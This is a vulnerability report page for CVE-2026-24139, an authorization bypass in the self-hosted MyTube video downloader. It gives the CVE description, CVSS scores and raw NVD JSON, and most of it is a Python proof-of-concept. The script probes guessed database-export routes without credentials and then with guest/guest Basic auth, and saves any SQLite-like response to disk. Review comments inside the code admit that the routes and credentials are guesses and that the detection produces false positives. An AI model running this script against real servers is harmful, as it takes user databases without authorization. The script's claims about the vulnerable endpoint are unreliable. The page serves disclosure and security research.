Security Vulnerability Report
CVE-2026-24139 CVSS 6.5 MEDIUM

CVE-2026-24139

Published: 2026-01-24 00:15:49
Last Modified: 2026-02-02 13:26:40

Description

MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below do not safeguard against authorization bypass, allowing guest users to download the complete application database. The application fails to properly validate user permissions on the database export endpoint, enabling low-privileged users to access sensitive data they should not have permission to view.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:franklioxygen:mytube:*:*:*:*:*:*:*:* - VULNERABLE
MyTube <= 1.7.78

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24139 PoC - MyTube Authorization Bypass
# Target: MyTube <= 1.7.78
# Vulnerability: Database export endpoint lacks proper authorization check
#
# NOTE(review): nothing in this script is derived from MyTube's source. The
# route list below is guessed, the Basic-auth credentials are assumed, and the
# advisory text on this page names no endpoint. Before treating a result as
# evidence of the CVE, confirm the real export route against the patch commit
# referenced on this page (e271775e27d51b26e54731b7b874447f47a1f280).
import requests
import sys


def exploit_mytube(target_url):
    """
    Exploit authorization bypass in MyTube database export endpoint.
    Allows low-privileged or guest users to download the complete application database.

    Probes a fixed list of candidate paths under ``target_url`` twice: first
    without credentials, then with HTTP Basic auth ``guest``/``guest``. The
    first response that looks like a database is written to a file in the
    current working directory and ``True`` is returned; otherwise ``False``.

    Args:
        target_url: Base URL of the instance under test; a trailing ``/`` is
            stripped before each candidate path is appended.

    Returns:
        ``True`` when a response was saved as a database, ``False`` when no
        candidate path produced one.

    Raises:
        Nothing from the HTTP layer: ``requests.exceptions.RequestException``
        is caught and reported. ``OSError`` from writing the output file is
        not caught.
    """
    # Database export endpoint - typically found via path enumeration
    # NOTE(review): these paths are guesses, not MyTube's actual route; a miss
    # here says nothing about whether the instance is patched.
    export_endpoints = [
        "/export/database",
        "/api/export/db",
        "/backup/database",
        "/api/database/download",
        "/admin/export/database"
    ]

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2026-24139: Authorization Bypass in MyTube")

    for endpoint in export_endpoints:
        url = target_url.rstrip('/') + endpoint
        # Try without authentication (guest access)
        print(f"\n[*] Testing endpoint: {url}")
        try:
            # Method 1: Direct unauthenticated request
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                # Check if response contains database content
                content_type = response.headers.get('Content-Type', '')
                content_length = len(response.content)
                # Database files typically have specific signatures
                # NOTE(review): only the 'SQLite format 3' magic is a reliable
                # signal; 'application/octet-stream' matches any binary download
                # (e.g. a served video file), so a match on Content-Type alone
                # is a likely false positive and the saved file should be
                # inspected before it is reported as the application database.
                if 'sqlite' in content_type.lower() or \
                   'application/octet-stream' in content_type.lower() or \
                   response.content[:16].startswith(b'SQLite format 3'):
                    print(f"[!] VULNERABLE! Database export found at {url}")
                    print(f"[!] Content-Type: {content_type}")
                    print(f"[!] Content-Length: {content_length} bytes")
                    # Save the database
                    # The filename is built only from the constant endpoint
                    # list, so no user-controlled path component reaches open().
                    # The whole body is held in memory (response.content) before
                    # being written.
                    output_file = f"mytube_db_{endpoint.replace('/', '_')}.sqlite"
                    with open(output_file, 'wb') as f:
                        f.write(response.content)
                    print(f"[!] Database saved to: {output_file}")
                    return True
        except requests.exceptions.RequestException as e:
            # Connection/timeout errors on one path do not stop the scan.
            print(f"[-] Request failed: {e}")
            continue

    # Method 2: Try with basic authentication (low-privileged user)
    print("\n[*] Trying with low-privileged credentials...")
    try:
        # Common default credentials or low-priv user
        # NOTE(review): the advisory does not say MyTube uses HTTP Basic auth or
        # ships a 'guest' account; this pass only means anything if both hold.
        auth = ('guest', 'guest')
        for endpoint in export_endpoints:
            url = target_url.rstrip('/') + endpoint
            response = requests.get(url, auth=auth, timeout=10)
            # Stricter than Method 1: requires the SQLite magic, not just a
            # binary Content-Type.
            if response.status_code == 200 and response.content[:16].startswith(b'SQLite format 3'):
                print(f"[!] VULNERABLE with guest credentials!")
                output_file = f"mytube_db_auth_{endpoint.replace('/', '_')}.sqlite"
                with open(output_file, 'wb') as f:
                    f.write(response.content)
                print(f"[!] Database saved to: {output_file}")
                return True
    except requests.exceptions.RequestException as e:
        # Unlike Method 1, the first failing request aborts the whole
        # authenticated pass (the try wraps the loop, not the request).
        print(f"[-] Authenticated request failed: {e}")

    print("\n[-] Exploit completed. No vulnerable endpoint found or database not accessible.")
    return False


if __name__ == "__main__":
    # Single positional argument: the base URL of the instance under test.
    if len(sys.argv) < 2:
        print("Usage: python cve_2026_24139_poc.py <target_url>")
        print("Example: python cve_2026_24139_poc.py http://target.com:8080")
        sys.exit(1)
    target = sys.argv[1]
    exploit_mytube(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24139", "sourceIdentifier": "[email protected]", "published": "2026-01-24T00:15:49.313", "lastModified": "2026-02-02T13:26:40.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below do not safeguard against authorization bypass, allowing guest users to download the complete application database. The application fails to properly validate user permissions on the database export endpoint, enabling low-privileged users to access sensitive data they should not have permission to view."}, {"lang": "es", "value": "MyTube es un descargador y reproductor autoalojado para varios sitios web de video. Las versiones 1.7.78 e inferiores no protegen contra la omisión de autorización, permitiendo a los usuarios invitados descargar la base de datos completa de la aplicación. La aplicación no valida correctamente los permisos de usuario en el punto final de exportación de la base de datos, permitiendo a los usuarios con bajos privilegios acceder a datos sensibles a los que no deberían tener permiso para ver."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", 
"availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:franklioxygen:mytube:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.78", "matchCriteriaId": "5F5D04C2-9BCE-4945-BC56-3532544A03D7"}]}]}], "references": [{"url": "https://github.com/franklioxygen/MyTube/commit/e271775e27d51b26e54731b7b874447f47a1f280", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/franklioxygen/MyTube/security/advisories/GHSA-hhc3-8q8c-89q7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}